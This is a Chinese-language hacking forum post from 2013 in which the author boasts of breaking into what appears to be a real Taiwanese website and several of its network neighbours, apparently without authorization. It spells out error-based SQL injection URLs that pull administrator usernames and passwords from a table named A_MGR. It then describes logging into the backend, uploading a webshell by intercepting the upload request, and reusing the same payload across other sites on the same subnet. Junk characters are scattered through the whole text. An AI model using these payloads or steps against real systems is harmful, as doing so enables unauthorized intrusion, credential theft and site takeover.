发现一个注入点
- d. N# \3 H' }+ v# |( Dhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
, D# m% K6 ~& @2 ]
6 O$ a! i4 S$ r1 p- ~' | h7 G习惯性的加’having1=1--; o v- w% b& d b7 z
# T l0 |4 G K. _ x$ }2 ehttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
0 N- A; e+ h! O) H9 }2 p, h8 t( G2 _: m) r Y' f0 K
0
/ U/ ^. E" a; Q) v8 [4 _& ~ D3 i- u4 K! J1 h5 G
爆出Diary_A.dl_Title(这时候很激动啊). u; [6 d: ^ j+ f5 |
+ o0 [% y6 M- J% _& [那么继续
9 p$ Q( z1 A! ^http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
( H5 Q8 T g: ~# u; W8 P
9 W. n, v- Z7 P5 S+ S继续,一直爆下去
6 d- \! V2 n" C* ?( _
* _& K( T; E& l; F7 f! [! C, J- h爆到几个字段和表段 但是没找到需要的管理用户的字段# e6 Z" {* s3 g
9 D- U/ [) ?9 j7 b, y" h蛋疼了 怎么办 然后去后台登陆页看源码
9 c& Y2 c" I1 @9 O5 O8 S! q% V4 F. x9 J
0* |& [1 F! _" U J3 t
% P7 d) m/ d5 C; MInput name= “ADUID”5 I# U6 h1 g: H0 r
Input name= “ADPWD”: x6 w! Z+ }9 t( v: J1 r
- g+ w0 t" W+ L( I# C/ R
很幸运 找到了字段那就继续
7 H! V! q% R# o. x9 y _找到之后开始爆用户; X4 ?& i5 d; @1 }, n, m- U2 t3 U
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—) n+ O _- A+ W+ T D4 x+ S
爆密码2 Z" p. F" x- |$ m: u _
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—0 f6 `5 f8 d: {' T
测试了下 这个注入点只能爆到文章哪里的表 # ^9 I+ X( q7 i1 U T& E
& y5 y, F; H& ~" Q# u3 K+ V头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
% T- B; G/ q! r# r; ^+ }* [% T' r, k3 s- f2 g7 b' M0 E
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了" p! Z* b* M3 y' _8 u& G1 l- _
6 |1 b6 ^7 B+ `9 D473
, K8 P6 R" w2 R* I! V0 H( o. l' r8 S* i
进后台* z; w9 N6 }- s |- i6 E1 n B1 v
# Z# T# x' H; W9 @* x
7 D4 V4 t6 f! I3 B+ ~
发现几个上传点 有的地方不能上传 而且防止恶意代码
9 ^* C F$ ?1 b( ` x5 B9 X+ h9 o3 H" e$ l5 d) ~
没办法 各种百度各种找大牛 找到一只好像可以突破的马
- `" T6 g+ {1 b: m! @/ R) J
8 y5 x& w( n& a# }% `" X# f. u F% z, a
在系统管理那里直接上传 不过没有显示地址
7 f% \& {7 A' L( I) a' [0 ~7 M7 x* \$ k
再上传一次 抓包 搞定OK# ~+ ?9 z- C" J
% i% O& S0 C3 _' D7 l, y
/ h/ [7 V- A5 P+ ]( ^: c5 N
" X7 c; J, b r% b4727 X9 ~5 t0 S F. K! b8 n
* }# B( c5 z, r晚上不行了 去睡觉。。。
- F+ J( d9 v: ^# i1 f9 f- s第二天刚起床 闲的没事做继续日站吧
: J, n* a1 X1 f' T
. p- H+ E- H7 |6 z3 T) X% j+ h0 A找个站 就把这个站的旁c扫了下& u, `5 z6 R- {+ |# h6 f) S4 [, o
^: l5 C, q* y5 c& x发现c段也有一个购物站 ,然后还和这个站的模板差不多
. n6 e( q& L2 X! A
' E0 x6 O$ ~" S m1 m; ~/ @1 \+ O就找到会员登录口测试. S" \$ D+ \, z# |9 a
2 m, e+ @ n: K8 A" O
'and (select top 1 MGR_UID from A_MGR)>0—/ Z- i7 b' u9 J6 y" u2 @8 k
果断爆到了 这时候我很激动 通杀7 e! m" U, V( @# V
) K8 h9 A4 N0 e- i% N7 u7 k6 A8 c再次翻c段
$ E) [% \6 I( I2 D: X9 |
$ q8 O. F4 `. b5 }4 _翻出几个站 都成功拿下( G" K; r. c' r- L/ B
0 K+ M3 t# n' S
! b, }5 l% b7 e) x9 _9 s. e5 M
) M( J. i! \" U6 w修复方案:5 Z+ B" x# D* C0 R
他们比我专业
: w( `& u0 Z; ]: x+ ]- D9 _) m7 ~+ P2 [+ e3 R: ~
4 w1 @; x! x- ^7 @4 x; r+ K
" Q; r. i5 O) q6 [+ j1 u+ B+ m |
发表于 2013-4-4 17:40:38
收藏
支持
反对